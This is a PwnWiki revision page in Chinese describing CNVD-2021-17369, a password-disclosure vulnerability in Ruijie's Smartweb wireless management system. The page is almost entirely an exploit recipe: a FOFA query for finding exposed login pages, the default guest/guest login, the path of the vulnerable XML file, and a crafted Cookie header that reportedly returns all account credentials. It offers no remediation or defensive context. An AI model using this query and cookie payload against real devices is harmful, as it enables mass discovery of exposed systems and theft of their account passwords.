Difference between revisions of "CNVD-2021-17369 銳捷Smartweb管理系統 密碼信息洩露漏洞/zh-cn"
From PwnWiki
(Created page with "CNVD-2021-17369 锐捷Smartweb管理系统 密码信息泄露漏洞") |
(Created page with "==漏洞位置==") |
||
| Line 13: | Line 13: | ||
| − | |||
==漏洞位置== | ==漏洞位置== | ||
| − | |||
<pre> | <pre> | ||
Revision as of 15:04, 12 July 2021
FOFA
title="无线smartWeb--登录页面"
默认guest密码
guest/guest
漏洞位置
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
漏洞利用
Cookice添加以下內容
Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
可以獲取所有賬戶信息
